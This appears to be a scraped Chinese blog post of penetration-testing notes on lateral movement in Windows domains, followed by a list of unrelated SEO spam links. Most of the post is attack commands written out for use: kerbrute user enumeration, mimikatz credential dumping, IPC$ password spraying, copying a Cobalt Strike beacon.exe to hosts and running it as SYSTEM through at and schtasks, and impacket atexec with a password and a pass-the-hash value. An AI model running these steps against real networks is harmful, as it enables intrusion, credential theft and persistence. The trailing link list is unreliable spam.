当前位置: 首页 > wzjs >正文

学校网站素材怎么样推广最有效最快速

学校网站素材,怎么样推广最有效最快速,网站建设公司muyunke,wordpress主题安装报错横向移动 1.使用非用户登录 net user /domain //不是域内返回如下 就是说和域的通信是不行的 2.使用域用户登录 net user /domain //在域内返回结果如下 3.不在域内,切换到域内用户(提权或者切换到域用户) 1.提权到system,这个用户可以脱离域的限制…

横向移动

1.使用非用户登录

net user /domain //不是域内返回如下

就是说和域的通信是不行的

2.使用域用户登录

net user /domain //在域内返回结果如下

3.不在域内,切换到域内用户(提权或者切换到域用户)

1.提权到system,这个用户可以脱离域的限制,逃离域控的控制
net user /domain   //提权到system发现可以和域控通讯了,但是这个和内网的配置有关
通过system进行横向移动即可

切换到其他用户,需要使用账号密码,通过获取账号密码就可以获取凭证

4.域内用户枚举

https://github.com/ropnop/kerbrute/releases
使用:kerbrute_windows_amd64.exe userenum --dc ip -d 域名 字典文件

5.mimikatz抓取密码

当系统为win10或者2012R2以上,内存中默认禁止缓存明文密码 可通过修改注册表的方式来进行抓取,但需要重启后重新登陆才行

6.IPC攻击

1.建立IPC连接到目标主机
2.拷贝要执行的命令脚本到目标主机
3.查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4.删除IPC连接

IPC$利用命令|密码喷射

net use      //查看共享
###登录本地用户要有计算机名字####
net use \\server\ipc$ "password" /user:username  #工作组用户登录
net use \\server\ipc$ "password" /user:domain\username  #域内用户登录
dir \\xx.xx.xx.xx\C$\    #查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat  #下载文件
copy \\xx.xx.xx.xx\C$    #复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del   #删除IPC
net view xx.xx.xx.xx   #查看对方共享

7.拷贝文件到目标机器运行

1.at < Windows2012 //小于2012用at

copy beacon.exe \\192.168.3.21\c$   //拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\beacon.exe  #添加计划任务f

2.schtasks>=Windows2012 //大于等于2012用schtasks

copy beacon.exe \\192.168.3.32\c$  #拷贝执行文件到目标机器
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc DALLY /tr c:\beacon.exe /F  #创建beacon任务对应执行文件
schtasks /run /s 192.168.3.32 /tn beacon /i  #运行beacon任务
schtasks /delete /s 192.168.3.32 /tn beacon /f   #删除beacon任务

正向后门要我主动连接,connect ip地址

8.使用CS的工具插件进行IPC的连接

这个很方便,比用命令简单

impacket套件,半交互式横向移动工具

https://github.com/fortra/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 "ver"  //通过明文密码登录
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"   //通过hashs执行命令连接

内网横向移动工具

https://mp.weixin.qq.com/s/L3uzzAAziZd1y3qNmADfoQ
http://www.dtcms.com/wzjs/168006.html

相关文章:

  • 网页设计作业10个页面郑州专业seo哪家好
  • mv网站源码怎么找精准客户资源
  • 设计公司网站巩义关键词优化推广
  • 一级做爰片a视频网站4链接交换
  • 音乐摄影网站建设宗旨2020年可用好用的搜索引擎
  • 茂名优化网站建设上海seo搜索优化
  • 网站建设公司 倒闭百度竞价排名魏则西事件分析
  • 上海企业宣传片制作哪家好seo搜索引擎优化薪资水平
  • 高端网站建设知识免费网页制作成品
  • 网站微信登录怎么做深圳营销推广引流公司
  • 深圳网站建设 营销什么是seo什么是sem
  • 南宁做网站外包网站策划书的撰写流程
  • wordpress多用户后台福州百度关键词优化
  • 江阴网站制作设计大连seo网站推广
  • 网上有做任务赚钱的网站有哪些微信管理系统软件
  • 做gif网站企业如何建立网站
  • 宁波专业网站建设公司网站宣传方法
  • 制作网站一年多少钱今天上海重大新闻事件
  • 装修行业 网站建设天猫关键词排名怎么控制
  • wordpress免费简约主题天津seo代理商
  • 厦门网站制作费用明细网络销售好做吗
  • 东莞 网站建设seo怎么才能优化好
  • yellow片免费观看高清在线中国网民博客 seo
  • 网站商城app 建设方案谷歌应用商店app下载
  • 元氏网站建设长沙网站seo服务
  • 婚纱摄影网站网站制作教程
  • 汕头建站服务网络销售怎么找客源
  • 国内免备案网站空间网络营销心得体会1000字
  • 云服务器建设网站看b站视频下载软件
  • 网站建设有哪些风险想要网站推广页